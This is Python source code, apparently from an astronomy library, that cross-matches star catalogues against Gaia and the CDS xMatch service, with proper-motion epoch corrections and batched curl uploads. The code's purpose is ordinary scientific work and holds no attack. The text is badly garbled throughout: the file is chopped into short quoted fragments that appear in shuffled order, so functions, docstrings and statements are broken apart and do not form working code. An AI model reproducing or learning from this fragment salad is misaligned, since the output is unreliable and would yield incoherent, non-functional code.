filling_values=-9999.99, names=True, dtype='float128') def cds_matchback(cat,xcat,colRA='RA',colDec='DEC',selection='best', epoch=None,colpmRA='pmra',colpmDec='pmdec',): \"\"\" NAME:", "the same time dra=cat[colpmRA]/numpy.cos(cat[colDec]/180.*numpy.pi)\\ /3600000.*depoch ddec= cat[colpmDec]/3600000.*depoch # Don't shift", "'http://cdsxmatch.u-strasbg.fr/xmatch/api/v1/sync'], stdout=result) except subprocess.CalledProcessError: os.remove(posfilename) if os.path.exists(resultfilename): result.close() os.remove(resultfilename) result.close()", "field matching - Leung (UofT) \"\"\" if epoch1 is None:", "original catalog mai= cds_matchback(cat,ma,colRA=colRA,colDec=colDec,epoch=epoch, colpmRA=colpmRA,colpmDec=colpmDec) return (ma,mai) def _cds_match_batched(resultfilename,posfilename,maxdist,selection,xcat, nruns_necessary=1):", "in cat1 (assumed to be ICRS) colDec1= ('DEC') name of", "on m.source_id = g.source_id\"\"\" % table_identifier, upload_resource=xmlfilename, upload_table_name=\"my_table\") ma= job.get_results()", "to int64 will keep its precision data = numpy.genfromtxt(filename, delimiter=',',", "acoords.SkyCoord(xcat['RA'],xcat['DEC'], unit=(u.degree, u.degree),frame='icrs') idx,d2d,d3d = mc2.match_to_catalog_sky(mc1) mindx= d2d < 1e-5*u.arcsec", "Send to CDS for matching result= open(resultfilename,'w') try: subprocess.check_call(['curl', '-X','POST',", "dra[numpy.isnan(cat[colpmRA])]= 0. ddec[numpy.isnan(cat[colpmDec])]= 0. else: dra= numpy.zeros(len(cat)) ddec= numpy.zeros(len(cat)) if", "neg one to indicate those indices untouch will be noticed", "= numpy.arange(len(cat2)) idx[cat2[col_field] == unique] = idx_1[temp_idx] d2d[cat2[col_field] == unique]", "dtype_list = [('{}'.format(i), numpy.float64) for i in to_list] dtype_list[dtype_list.index(('source_id', numpy.float64))]", "platform import shutil import subprocess import tempfile import warnings WIN32=", "ascension in degree in cat2 (assumed to be ICRS; includes", "to indicate those indices untouch will be noticed at the", "(important when one of the catalogs has duplicates) col_field= (None)", "cat1 with the declination in degree in cat1 (assumed to", "elif 'Gaia DR2' in cat['designation'][0].decode('utf-8'): if numpy.any(numpy.fabs(epoch-2015.5) > 0.01): warn_about_epoch=", "make sure filtering out all neg ones which are untouched", "as source_id is always integer anyway # first read everything", "posfilename.split('csv.')[-1].split('.')]) except ValueError: runs= '' nruns= 2**len(runs) if nruns >=", "original catalog xcat - matched catalog returned by xmatch.cds colRA=", "indices into cat of xcat entries: index[0] is cat index", "a Gaia catalog, but are not setting the epoch to", "CDS cross-matching service (see http://cdsxmatch.u-strasbg.fr/xmatch/doc/available-tables.html; things like 'vizier:Tycho2' or 'vizier:I/345/gaia2')", "posfilename2= posfilename+'.2' resultfilename1= resultfilename+'.1' resultfilename2= resultfilename+'.2' # Figure out which", "the coordinates in cat colpmRA= ('pmra') name of the tag", "(False) set to True if you are matching against Gaia", "import tempfile import warnings WIN32= platform.system() == 'Windows' import numpy", "want *all* columns returned; this runs a query at the", "with the right ascension colDec= ('DEC') name of the tag", "warn_about_epoch= True if warn_about_epoch: warnings.warn(\"You appear to be using a", "in cat2 colpmRA2= ('pmra') name of the tag in cat2", "Bovy (UofT) \"\"\" if epoch is None: if 'ref_epoch' in", "os.remove(resultfilename) result.close() return None def cds_load(filename): if WIN32: # windows", "resultfilename2= resultfilename+'.2' # Figure out which of the hierarchy we", "warn_about_epoch= True elif 'Gaia DR2' in cat['designation'][0].decode('utf-8'): if numpy.any(numpy.fabs(epoch-2015.5) >", "tag specified by the string OUTPUT: (index into cat1 of", "nruns_necessary=nruns_necessary) sys.stdout.write('\\r'+_ERASESTR+'\\r') sys.stdout.flush() # Combine results with open(resultfilename,'w') as resultfile:", "if 'ref_epoch' in cat2.dtype.fields: epoch2= cat2['ref_epoch'] else: epoch2= 2000. _check_epoch(cat1,epoch1)", "the cross-match tab= Table(numpy.array([ma['source_id'],ma['RA'],ma['DEC']]).T, names=('source_id','RA','DEC'), dtype=('int64','float64','float64')) xmlfilename= tempfile.mktemp('.xml',dir=os.getcwd()) tab.write(xmlfilename,format='votable') #get", "if epoch is None: if 'ref_epoch' in cat.dtype.fields: epoch= cat['ref_epoch']", "as posfile: num_lines= sum(1 for line in posfile) # Write", "cat2[colpmDec2]/3600000.*depoch # Don't shift objects with non-existing proper motion dra[numpy.isnan(cat2[colpmRA2])]=", "get both catalogs at the same time dra=cat2[colpmRA2]/numpy.cos(cat2[colDec2]/180.*numpy.pi)\\ /3600000.*depoch ddec=", "proper motion in cat2 if epochs are different) INPUT: cat1", "source, if False do the opposite (important when one of", "with open(posfilename,'w') as csvfile: wr= csv.writer(csvfile,delimiter=',',quoting=csv.QUOTE_MINIMAL) wr.writerow(['RA','DEC']) for ii in", "acoords.SkyCoord(cat[colRA]-dra,cat[colDec]-ddec, unit=(u.degree, u.degree),frame='icrs') mc2= acoords.SkyCoord(xcat['RA'],xcat['DEC'], unit=(u.degree, u.degree),frame='icrs') idx,d2d,d3d = mc2.match_to_catalog_sky(mc1)", "(ma,mai) def _cds_match_batched(resultfilename,posfilename,maxdist,selection,xcat, nruns_necessary=1): \"\"\"CDS xMatch (sometimes?) fails for large", "d2d[cat2[col_field] == unique] = temp_d2d else: temp_idx, temp_d2d, d3d =", "reduce workload to just get the column name to_list =", "% 360., cat[ii][colDec]]-ddec[ii]) _cds_match_batched(resultfilename,posfilename,maxdist,selection,xcat) # Directly match on input RA", "time dra=cat[colpmRA]/numpy.cos(cat[colDec]/180.*numpy.pi)\\ /3600000.*depoch ddec= cat[colpmDec]/3600000.*depoch # Don't shift objects with", "the proper motion in right ascension in degree in cat", "...\\r\"\\ .format(thisrun1,nruns)) sys.stdout.flush() nruns_necessary= _cds_match_batched(resultfilename1,posfilename1, maxdist,selection,xcat, nruns_necessary=nruns_necessary) sys.stdout.write('\\r'+\"Working on CDS", "numpy.zeros(len(cat)) if selection != 'all': selection= 'best' if selection ==", "just get the column name to_list = list(data.dtype.names) # construct", "in CDS mc1= acoords.SkyCoord(cat[colRA]-dra,cat[colDec]-ddec, unit=(u.degree, u.degree),frame='icrs') mc2= acoords.SkyCoord(xcat['RA'],xcat['DEC'], unit=(u.degree, u.degree),frame='icrs')", "match on input RA ma= cds_load(resultfilename) if gaia_all_columns: from astroquery.gaia", "match is against *original* coords, # not matched coords in", "first row max to reduce workload to just get the", "uses the curl interface INPUT: cat - a catalog to", "with non-existing proper motion dra[numpy.isnan(cat[colpmRA])]= 0. ddec[numpy.isnan(cat[colpmDec])]= 0. else: dra=", "(UofT) 2018-05-08 - Added gaia_all_columns - Bovy (UofT) \"\"\" if", "are matching against Gaia DR2 and want *all* columns returned;", "source_id is double # get around this by squeezing precision", "(None) if None, simply cross-match on RA and Dec; if", "motion in cat2 if epochs are different) INPUT: cat1 -", "cat2.dtype.fields: epoch2= cat2['ref_epoch'] else: epoch2= 2000. _check_epoch(cat1,epoch1) _check_epoch(cat2,epoch2) depoch= epoch2-epoch1", "the tag in cat with the proper motion in declination", "OUTPUT: Array indices into cat of xcat entries: index[0] is", "data tag specified by the string OUTPUT: (index into cat1", "get both catalogs at the same time dra=cat[colpmRA]/numpy.cos(cat[colDec]/180.*numpy.pi)\\ /3600000.*depoch ddec=", "r in posfilename.split('csv.')[-1].split('.')]) except ValueError: runs= '' nruns= 2**len(runs) if", "as resultfile1: for line in resultfile1: resultfile.write(line) with open(resultfilename2,'r') as", "the same time dra=cat2[colpmRA2]/numpy.cos(cat2[colDec2]/180.*numpy.pi)\\ /3600000.*depoch ddec= cat2[colpmDec2]/3600000.*depoch # Don't shift", "dra[numpy.isnan(cat[colpmRA])]= 0. ddec[numpy.isnan(cat[colpmDec])]= 0. else: dra= numpy.zeros(len(cat)) ddec= numpy.zeros(len(cat)) #", "posfile1.write(posfile.readline()) with open(posfilename2,'w') as posfile2: with open(posfilename,'r') as posfile: posfile2.write(posfile.readline())", "output of the cross-match tab= Table(numpy.array([ma['source_id'],ma['RA'],ma['DEC']]).T, names=('source_id','RA','DEC'), dtype=('int64','float64','float64')) xmlfilename= tempfile.mktemp('.xml',dir=os.getcwd())", "tag in cat2 with the declination in degree in cat2", "to make sure filtering out all neg ones which are", "the tag in cat with the right ascension colDec= ('DEC')", "original catalog INPUT cat - original catalog xcat - matched", "in cat with the declination selection= ('best') select either all", "setting the epoch to 2015. (DR1) or 2015.5 (DR2), which", "to be ICRS) colDec2= ('DEC') name of the tag in", "0. ddec[numpy.isnan(cat[colpmDec])]= 0. else: dra= numpy.zeros(len(cat)) ddec= numpy.zeros(len(cat)) if selection", "try: subprocess.check_call(['curl', '-X','POST', '-F','request=xmatch', '-F','distMaxArcsec=%i' % maxdist, '-F','selection=%s' % selection,", "if warn_about_epoch: warnings.warn(\"You appear to be using a Gaia catalog,", "tag in cat2 with the proper motion in right ascension", "with non-existing proper motion dra[numpy.isnan(cat2[colpmRA2])]= 0. ddec[numpy.isnan(cat2[colpmDec2])]= 0. else: dra=", "(UofT) 2019-07-07 - add additional catalog field matching - Leung", "ddec= cat2[colpmDec2]/3600000.*depoch # Don't shift objects with non-existing proper motion", "batch {} / {} ...\\r\"\\ .format(thisrun2,nruns)) sys.stdout.flush() nruns_necessary= _cds_match_batched(resultfilename2,posfilename2, maxdist,selection,xcat,", "numpy.zeros(len(cat2), dtype=int) else: d2d = numpy.ones(len(cat1)) * -1. idx =", "open(resultfilename,'w') try: subprocess.check_call(['curl', '-X','POST', '-F','request=xmatch', '-F','distMaxArcsec=%i' % maxdist, '-F','selection=%s' %", "catalogs (incl. proper motion in cat2 if epochs are different)", "by the CDS xMatch instead...\") else: ma.rename_column('mra','RA') ma.rename_column('mdec','DEC') finally: os.remove(xmlfilename)", "def cds(cat,xcat='vizier:I/350/gaiaedr3',maxdist=2,colRA='RA',colDec='DEC', selection='best',epoch=None,colpmRA='pmra',colpmDec='pmdec', savefilename=None,gaia_all_columns=False): \"\"\" NAME: cds PURPOSE: Cross-match against", "runs= '' nruns= 2**len(runs) if nruns >= nruns_necessary: # Only", "but source_id is double # get around this by squeezing", "('pmdec') name of the tag in cat2 with the proper", "filling_values=-9999.99, names=True, max_rows=1, dtype='float64') # only read the first row", "\"\"\" NAME: xmatch PURPOSE: cross-match two catalogs (incl. proper motion", "work... savefilename= (None) if set, save the output from CDS", "# Remove temporary files os.remove(posfilename) if savefilename is None: os.remove(resultfilename)", "_cds_match_batched(resultfilename,posfilename,maxdist,selection,xcat) # Directly match on input RA ma= cds_load(resultfilename) if", "[only used when epochs are different] colpmDec2= ('pmdec') name of", "tempfile.mktemp('.csv',dir=os.getcwd()) resultfilename= tempfile.mktemp('.csv',dir=os.getcwd()) with open(posfilename,'w') as csvfile: wr= csv.writer(csvfile,delimiter=',',quoting=csv.QUOTE_MINIMAL) wr.writerow(['RA','DEC'])", "sys.stdout.flush() nruns_necessary= _cds_match_batched(resultfilename2,posfilename2, maxdist,selection,xcat, nruns_necessary=nruns_necessary) sys.stdout.write('\\r'+_ERASESTR+'\\r') sys.stdout.flush() # Combine results", "filling_values=-9999.99, names=True, dtype='float128') def cds_matchback(cat,xcat,colRA='RA',colDec='DEC',selection='best', epoch=None,colpmRA='pmra',colpmDec='pmdec',): \"\"\" NAME: cds_matchback PURPOSE:", "import csv import sys import os import os.path import platform", "'ref_epoch' in cat1.dtype.fields: epoch1= cat1['ref_epoch'] else: epoch1= 2000. if epoch2", "-1. idx = numpy.zeros(len(cat1), dtype=int) for unique in uniques: #", "set to True if you are matching against Gaia DR2", "construct a list where everything is fp64 except 'source_id' being", "resultfile: with open(resultfilename1,'r') as resultfile1: for line in resultfile1: resultfile.write(line)", "not have float128, but source_id is double # get around", "0 or idx_2.shape[0] == 0: # the case where a", "except subprocess.CalledProcessError: os.remove(posfilename) if os.path.exists(resultfilename): result.close() os.remove(resultfilename) result.close() return None", "motion dra[numpy.isnan(cat[colpmRA])]= 0. ddec[numpy.isnan(cat[colpmDec])]= 0. else: dra= numpy.zeros(len(cat)) ddec= numpy.zeros(len(cat))", "if idx_1.shape[0] == 0 or idx_2.shape[0] == 0: # the", "os.path.exists(resultfilename): result.close() os.remove(resultfilename) result.close() return None def cds_load(filename): if WIN32:", "{} ...\\r\"\\ .format(thisrun1,nruns)) sys.stdout.flush() nruns_necessary= _cds_match_batched(resultfilename1,posfilename1, maxdist,selection,xcat, nruns_necessary=nruns_necessary) sys.stdout.write('\\r'+\"Working on", "# python 2/3 format string raise KeyError(\"'%s' does not exist", "posfile: num_lines= sum(1 for line in posfile) # Write the", "cat with the declination selection= ('best') select either all matches", "maxdist, '-F','selection=%s' % selection, '-F','RESPONSEFORMAT=csv', '-F','cat1=@%s' % os.path.basename(posfilename), '-F','colRA1=RA', '-F','colDec1=DEC',", "Cut in half cnt= 0 with open(posfilename,'r') as posfile: with", "None: if 'ref_epoch' in cat2.dtype.fields: epoch2= cat2['ref_epoch'] else: epoch2= 2000.", "- original catalog xcat - matched catalog returned by xmatch.cds", "NAME: cds PURPOSE: Cross-match against a catalog in the CDS", "(assumed to be ICRS) colDec2= ('DEC') name of the tag", "with additional matching in the data tag specified by the", "colRA= ('RA') name of the tag in cat with the", "in cat2 if epochs are different) INPUT: cat1 - First", "cds_load(resultfilename) except ValueError: # Assume this is the time-out failure", "over the class idx_1 = numpy.arange(cat1[colRA1].shape[0])[cat1[col_field] == unique] idx_2 =", "swap: temp_idx, temp_d2d, d3d = mc2[idx_2].match_to_catalog_sky(mc1[idx_1]) m1 = numpy.arange(len(cat2)) idx[cat2[col_field]", "this path; can match back using cds_matchback OUTPUT: (xcat entries", "cross-matching service (http://cdsxmatch.u-strasbg.fr/xmatch); uses the curl interface INPUT: cat -", "on CDS xMatch batch {} / {} ...\\r\"\\ .format(thisrun1,nruns)) sys.stdout.flush()", "cnt= 0 with open(posfilename,'r') as posfile: with open(posfilename1,'a') as posfile1:", "in cat2.dtype.fields: epoch2= cat2['ref_epoch'] else: epoch2= 2000. _check_epoch(cat1,epoch1) _check_epoch(cat2,epoch2) depoch=", "False if 'ref_epoch' in cat.dtype.fields: if 'designation' not in cat.dtype.fields:", "the time-out failure pass else: return nruns # xMatch failed", "are running try: runs= ''.join([str(int(r)-1) for r in posfilename.split('csv.')[-1].split('.')]) except", "is None: if 'ref_epoch' in cat2.dtype.fields: epoch2= cat2['ref_epoch'] else: epoch2=", "match if we don't already know that we should #", "'gaiadr2' try: job= Gaia.launch_job_async( \"\"\"select g.*, m.RA as mRA, m.DEC", "as csvfile: wr= csv.writer(csvfile,delimiter=',',quoting=csv.QUOTE_MINIMAL) wr.writerow(['RA','DEC']) for ii in range(len(cat)): wr.writerow([(cat[ii][colRA]-dra[ii]+360.)", "temp_d2d.unit # make sure finally we have an unit on", "== unique] = temp_d2d else: temp_idx, temp_d2d, d3d = mc1[idx_1].match_to_catalog_sky(mc2[idx_2])", "to be ICRS) [only used when epochs are different] swap=", "for non-zero epoch difference - Bovy (UofT) \"\"\" if selection", "the tag in cat1 with the declination in degree in", "the original catalog INPUT cat - original catalog xcat -", "because match is against *original* coords, # not matched coords", "if 'ref_epoch' in cat1.dtype.fields: epoch1= cat1['ref_epoch'] else: epoch1= 2000. if", "index into cat2 of matching objects, angular separation between matching", "we have an unit on d2d array s.t. \"<\" operation", "in a format understood by the CDS cross-matching service (see", "catalog maxdist= (2) maximum distance in arcsec colRA1= ('RA') name", "'RA' and 'DEC' keywords (see below) xcat= ('vizier:I/350/gaiaedr3') name of", "the tag in cat2 with the proper motion in right", "each cat1 source, if False do the opposite (important when", "* -1. idx = numpy.zeros(len(cat1), dtype=int) for unique in uniques:", "the declination in degree in cat1 (assumed to be ICRS)", "acoords.SkyCoord(cat1[colRA1],cat1[colDec1], unit=(u.degree, u.degree),frame='icrs') mc2= acoords.SkyCoord(cat2[colRA2]-dra,cat2[colDec2]-ddec, unit=(u.degree, u.degree),frame='icrs') if col_field is", "closest matches in cat2 for each cat1 source, if False", "do the opposite (important when one of the catalogs has", "in cat (assumed to be ICRS) [only used when epoch", "('RA') name of the tag in cat2 with the right", "warnings WIN32= platform.system() == 'Windows' import numpy import astropy.coordinates as", "finally: os.remove(xmlfilename) # Remove temporary files os.remove(posfilename) if savefilename is", "temp_idx, temp_d2d, d3d = mc1[idx_1].match_to_catalog_sky(mc2[idx_2]) m1 = numpy.arange(len(cat1)) idx[cat1[col_field] ==", "== unique] if idx_1.shape[0] == 0 or idx_2.shape[0] == 0:", "# Match back to the original catalog mai= cds_matchback(cat,ma,colRA=colRA,colDec=colDec,epoch=epoch, colpmRA=colpmRA,colpmDec=colpmDec)", "# Don't shift objects with non-existing proper motion dra[numpy.isnan(cat[colpmRA])]= 0.", "except KeyError: # python 2/3 format string raise KeyError(\"'%s' does", "simply cross-match on RA and Dec; if a string, then", "integer anyway # first read everything as fp64 and then", "posfile2.write(posfile.readline()) # Cut in half cnt= 0 with open(posfilename,'r') as", "cnt == 0: cnt+= 1 continue if cnt < num_lines//2:", "d3d = mc2[idx_2].match_to_catalog_sky(mc1[idx_1]) m1 = numpy.arange(len(cat2)) idx[cat2[col_field] == unique] =", "CDS cross-match not currently implemented\") if epoch is None: if", "= mc2[idx_2].match_to_catalog_sky(mc1[idx_1]) m1 = numpy.arange(len(cat2)) idx[cat2[col_field] == unique] = idx_1[temp_idx]", "cnt+= 1 # Can stop counting once this if is", "os import os.path import platform import shutil import subprocess import", "temporary file with the XML output of the cross-match tab=", "nruns_necessary: # Only run this level's match if we don't", "posfilename+'.2' resultfilename1= resultfilename+'.1' resultfilename2= resultfilename+'.2' # Figure out which of", "motion in right ascension in degree in cat2 (assumed to", "dra= numpy.zeros(len(cat)) ddec= numpy.zeros(len(cat)) # xmatch to v. small diff.,", "*original* coords, # not matched coords in CDS mc1= acoords.SkyCoord(cat[colRA]-dra,cat[colDec]-ddec,", "mc1= acoords.SkyCoord(cat1[colRA1],cat1[colDec1], unit=(u.degree, u.degree),frame='icrs') mc2= acoords.SkyCoord(cat2[colRA2]-dra,cat2[colDec2]-ddec, unit=(u.degree, u.degree),frame='icrs') if col_field", "is against *original* coords, # not matched coords in CDS", "upload_table_name=\"my_table\") ma= job.get_results() except: print(\"gaia_tools.xmath.cds failed to retrieve all gaia", "cat1['ref_epoch'] else: epoch1= 2000. if epoch2 is None: if 'ref_epoch'", "for r in posfilename.split('csv.')[-1].split('.')]) except ValueError: runs= '' nruns= 2**len(runs)", "proper motion to get both catalogs at the same time", "Gaia # Write another temporary file with the XML output", "in declination in degree in cat (assumed to be ICRS)", "to get both catalogs at the same time dra=cat[colpmRA]/numpy.cos(cat[colDec]/180.*numpy.pi)\\ /3600000.*depoch", "is None: if 'ref_epoch' in cat1.dtype.fields: epoch1= cat1['ref_epoch'] else: epoch1=", "array s.t. \"<\" operation can complete else: if swap: idx,d2d,d3d", "Assume this is the time-out failure pass else: return nruns", "line in resultfile2: if line[0] == 'a': continue resultfile.write(line) #", "if swap: idx,d2d,d3d = mc2.match_to_catalog_sky(mc1) m1= numpy.arange(len(cat2)) else: idx,d2d,d3d =", "== 'a': continue resultfile.write(line) # Remove intermediate files os.remove(posfilename1) os.remove(posfilename2)", "in degree in cat1 (assumed to be ICRS) colDec1= ('DEC')", "epoch-2000. if numpy.any(depoch != 0.): # Use proper motion to", "the batches are small enough to not fail\"\"\" # Figure", "_check_epoch(cat,epoch) depoch= epoch-2000. if numpy.any(depoch != 0.): # Use proper", "platform.system() == 'Windows' import numpy import astropy.coordinates as acoords from", "cat (assumed to be ICRS; includes cos(Dec)) [only used when", "int64 on source_id as source_id is always integer anyway #", "- First catalog cat2 - Second catalog maxdist= (2) maximum", "= numpy.unique(cat1[col_field]) if swap: # times neg one to indicate", "an unit on d2d array s.t. \"<\" operation can complete", "index[0] is cat index of xcat[0] HISTORY: 2016-09-12 - Written", "when one of the catalogs has duplicates) col_field= (None) if", "duplicates) col_field= (None) if None, simply cross-match on RA and", "line in posfile: if cnt == 0: cnt+= 1 continue", "posfilename= tempfile.mktemp('.csv',dir=os.getcwd()) resultfilename= tempfile.mktemp('.csv',dir=os.getcwd()) with open(posfilename,'w') as csvfile: wr= csv.writer(csvfile,delimiter=',',quoting=csv.QUOTE_MINIMAL)", "being int64 dtype_list = [('{}'.format(i), numpy.float64) for i in to_list]", "2018-05-04 - Account for non-zero epoch difference - Bovy (UofT)", "NotImplementedError(\"selection='all' CDS cross-match not currently implemented\") if epoch is None:", "(assumed to be ICRS) [only used when epoch != 2000.]", "swap: # times neg one to indicate those indices untouch", "separation between matching objects) HISTORY: 2016-09-12 - Written - Bovy", "ddec= 0. mc1= acoords.SkyCoord(cat1[colRA1],cat1[colDec1], unit=(u.degree, u.degree),frame='icrs') mc2= acoords.SkyCoord(cat2[colRA2]-dra,cat2[colDec2]-ddec, unit=(u.degree, u.degree),frame='icrs')", "num_lines//2: posfile1.write(line) cnt+= 1 # Can stop counting once this", "\"\"\"CDS xMatch (sometimes?) fails for large matches, because of a", "to be ICRS; includes cos(Dec)) [only used when epochs are", "of the coordinates in cat1 colRA2= ('RA') name of the", "in to_list] dtype_list[dtype_list.index(('source_id', numpy.float64))] = ('source_id', numpy.uint64) return numpy.genfromtxt(filename, delimiter=',',", "else: temp_idx, temp_d2d, d3d = mc1[idx_1].match_to_catalog_sky(mc2[idx_2]) m1 = numpy.arange(len(cat1)) idx[cat1[col_field]", "of xcat[0]) HISTORY: 2016-09-12 - Written based on RC catalog", "Account for Gaia epoch 2015 - Bovy (UofT) 2018-05-08 -", "cat1 (assumed to be ICRS) epoch1= (2000.) epoch of the", "already know that we should # be using smaller batches", "HISTORY: 2016-09-12 - Written - Bovy (UofT) 2018-05-04 - Account", "the tag in cat2 with the proper motion in declination", "query at the Gaia Archive, which may or may not", "# Write another temporary file with the XML output of", "- Bovy (UofT) 2019-07-07 - add additional catalog field matching", "objects with non-existing proper motion dra[numpy.isnan(cat[colpmRA])]= 0. ddec[numpy.isnan(cat[colpmDec])]= 0. else:", "in cat['designation'][0].decode('utf-8'): if numpy.any(numpy.fabs(epoch-2015.5) > 0.01): warn_about_epoch= True if warn_about_epoch:", "'ref_epoch' in cat.dtype.fields: epoch= cat['ref_epoch'] else: epoch= 2000. _check_epoch(cat,epoch) depoch=", "unique] = idx_1[temp_idx] d2d[cat2[col_field] == unique] = temp_d2d else: temp_idx,", "= numpy.ones(len(cat1)) * -1. idx = numpy.zeros(len(cat1), dtype=int) for unique", "(assumed to be ICRS) colDec1= ('DEC') name of the tag", "[only used when epochs are different] swap= (False) if False,", "epoch of the coordinates in cat2 colpmRA2= ('pmra') name of", "cat1 with the right ascension in degree in cat1 (assumed", "of the tag in cat with the right ascension colDec=", "cds_matchback(cat,ma,colRA=colRA,colDec=colDec,epoch=epoch, colpmRA=colpmRA,colpmDec=colpmDec) return (ma,mai) def _cds_match_batched(resultfilename,posfilename,maxdist,selection,xcat, nruns_necessary=1): \"\"\"CDS xMatch (sometimes?)", "for line in resultfile1: resultfile.write(line) with open(resultfilename2,'r') as resultfile2: for", "of xcat[0] HISTORY: 2016-09-12 - Written - Bovy (UofT) 2018-05-04", "degree in cat1 (assumed to be ICRS) epoch1= (2000.) epoch", "or idx_2.shape[0] == 0: # the case where a class", "columns, returning just the default returned by the CDS xMatch", "out all neg ones which are untouched mindx= ((d2d <", "in arcsec colRA1= ('RA') name of the tag in cat1", "catalog, but are not setting the epoch to 2015. (DR1)", "because of time-out, split posfilename1= posfilename+'.1' posfilename2= posfilename+'.2' resultfilename1= resultfilename+'.1'", "find closest matches in cat2 for each cat1 source, if", "/3600000.*depoch ddec= cat[colpmDec]/3600000.*depoch # Don't shift objects with non-existing proper", "mc2= acoords.SkyCoord(cat2[colRA2]-dra,cat2[colDec2]-ddec, unit=(u.degree, u.degree),frame='icrs') if col_field is not None: try:", "may or may not work... savefilename= (None) if set, save", "'selection' at http://cdsxmatch.u-strasbg.fr/xmatch/doc/API-calls.html) epoch= (2000.) epoch of the coordinates in", "objects, angular separation between matching objects) HISTORY: 2016-09-12 - Written", "back to the original catalog INPUT cat - original catalog", "epochs are different] swap= (False) if False, find closest matches", "1 # Can stop counting once this if is done", "keep its precision data = numpy.genfromtxt(filename, delimiter=',', skip_header=0, filling_values=-9999.99, names=True,", "tab.write(xmlfilename,format='votable') #get the data release.... table_identifier = xcat.split('/')[-1] if table_identifier", "Gaia.launch_job_async( \"\"\"select g.*, m.RA as mRA, m.DEC as mDEC from", "name of the tag in cat1 with the right ascension", "% table_identifier, upload_resource=xmlfilename, upload_table_name=\"my_table\") ma= job.get_results() except: print(\"gaia_tools.xmath.cds failed to", "RA ma= cds_load(resultfilename) if gaia_all_columns: from astroquery.gaia import Gaia #", "right ascension in degree in cat1 (assumed to be ICRS)", "against, in a format understood by the CDS cross-matching service", "_cds_match_batched(resultfilename,posfilename,maxdist,selection,xcat, nruns_necessary=1): \"\"\"CDS xMatch (sometimes?) fails for large matches, because", "files os.remove(posfilename) if savefilename is None: os.remove(resultfilename) else: shutil.move(resultfilename,savefilename) #", "% maxdist, '-F','selection=%s' % selection, '-F','RESPONSEFORMAT=csv', '-F','cat1=@%s' % os.path.basename(posfilename), '-F','colRA1=RA',", "nruns_necessary= _cds_match_batched(resultfilename2,posfilename2, maxdist,selection,xcat, nruns_necessary=nruns_necessary) sys.stdout.write('\\r'+_ERASESTR+'\\r') sys.stdout.flush() # Combine results with", "not currently implemented\") if epoch is None: if 'ref_epoch' in", "cos(Dec)) [only used when epochs are different] colpmDec2= ('pmdec') name", "cat['designation'][0].decode('utf-8'): if numpy.any(numpy.fabs(epoch-2015.5) > 0.01): warn_about_epoch= True if warn_about_epoch: warnings.warn(\"You", "names=True, dtype=dtype_list) else: return numpy.genfromtxt(filename, delimiter=',', skip_header=0, filling_values=-9999.99, names=True, dtype='float128')", "m.DEC as mDEC from %s.gaia_source as g inner join tap_upload.my_table", "result.close() os.remove(resultfilename) result.close() return None def cds_load(filename): if WIN32: #", "open(posfilename,'w') as csvfile: wr= csv.writer(csvfile,delimiter=',',quoting=csv.QUOTE_MINIMAL) wr.writerow(['RA','DEC']) for ii in range(len(cat)):", "input RA ma= cds_load(resultfilename) if gaia_all_columns: from astroquery.gaia import Gaia", "CDS for matching result= open(resultfilename,'w') try: subprocess.check_call(['curl', '-X','POST', '-F','request=xmatch', '-F','distMaxArcsec=%i'", "catalog returned by xmatch.cds colRA= ('RA') name of the tag", "dra=cat[colpmRA]/numpy.cos(cat[colDec]/180.*numpy.pi)\\ /3600000.*depoch ddec= cat[colpmDec]/3600000.*depoch # Don't shift objects with non-existing", "hierarchy we are running try: runs= ''.join([str(int(r)-1) for r in", "m.source_id = g.source_id\"\"\" % table_identifier, upload_resource=xmlfilename, upload_table_name=\"my_table\") ma= job.get_results() except:", "be using smaller batches _cds_basic_match(resultfilename,posfilename,maxdist,selection,xcat) try: ma= cds_load(resultfilename) except ValueError:", "header line with open(posfilename1,'w') as posfile1: with open(posfilename,'r') as posfile:", "wr= csv.writer(csvfile,delimiter=',',quoting=csv.QUOTE_MINIMAL) wr.writerow(['RA','DEC']) for ii in range(len(cat)): wr.writerow([(cat[ii][colRA]-dra[ii]+360.) % 360.,", "epoch2-epoch1 if numpy.any(depoch != 0.): # Use proper motion to", "('source_id', numpy.uint64) return numpy.genfromtxt(filename, delimiter=',', skip_header=0, filling_values=-9999.99, names=True, dtype=dtype_list) else:", "the data tag specified by the string OUTPUT: (index into", "declination in degree in cat2 (assumed to be ICRS) epoch2=", "swap: idx,d2d,d3d = mc2.match_to_catalog_sky(mc1) m1= numpy.arange(len(cat2)) else: idx,d2d,d3d = mc1.match_to_catalog_sky(mc2)", "on RC catalog code - Bovy (UofT) 2016-09-21 - Account", "skip_header=0, filling_values=-9999.99, names=True, dtype=dtype_list) else: return numpy.genfromtxt(filename, delimiter=',', skip_header=0, filling_values=-9999.99,", "should # be using smaller batches _cds_basic_match(resultfilename,posfilename,maxdist,selection,xcat) try: ma= cds_load(resultfilename)", "xmatch PURPOSE: cross-match two catalogs (incl. proper motion in cat2", "# not matched coords in CDS mc1= acoords.SkyCoord(cat[colRA]-dra,cat[colDec]-ddec, unit=(u.degree, u.degree),frame='icrs')", "cross match, requires 'RA' and 'DEC' keywords (see below) xcat=", "ascension colDec= ('DEC') name of the tag in cat with", "as g inner join tap_upload.my_table as m on m.source_id =", "around this by squeezing precision from int64 on source_id as", "except: print(\"gaia_tools.xmath.cds failed to retrieve all gaia columns, returning just", "wr.writerow([(cat[ii][colRA]-dra[ii]+360.) % 360., cat[ii][colDec]]-ddec[ii]) _cds_match_batched(resultfilename,posfilename,maxdist,selection,xcat) # Directly match on input", "astroquery.gaia import Gaia # Write another temporary file with the", "''.join([str(int(r)-1) for r in posfilename.split('csv.')[-1].split('.')]) except ValueError: runs= '' nruns=", "# windows do not have float128, but source_id is double", "if swap: # times neg one to indicate those indices", "...\\r\"\\ .format(thisrun2,nruns)) sys.stdout.flush() nruns_necessary= _cds_match_batched(resultfilename2,posfilename2, maxdist,selection,xcat, nruns_necessary=nruns_necessary) sys.stdout.write('\\r'+_ERASESTR+'\\r') sys.stdout.flush() #", "the coordinates in cat1 colRA2= ('RA') name of the tag", "skip_header=0, filling_values=-9999.99, names=True, max_rows=1, dtype='float64') # only read the first", "if set, save the output from CDS to this path;", "cat2 with the proper motion in declination in degree in", "0. else: dra= numpy.zeros(len(cat)) ddec= numpy.zeros(len(cat)) if selection != 'all':", "- Bovy (UofT) 2018-05-04 - Account for non-zero epoch difference", "> 0.01): warn_about_epoch= True elif 'Gaia DR2' in cat['designation'][0].decode('utf-8'): if", "(see 'selection' at http://cdsxmatch.u-strasbg.fr/xmatch/doc/API-calls.html) epoch= (2000.) epoch of the coordinates", "into cat of xcat entries: 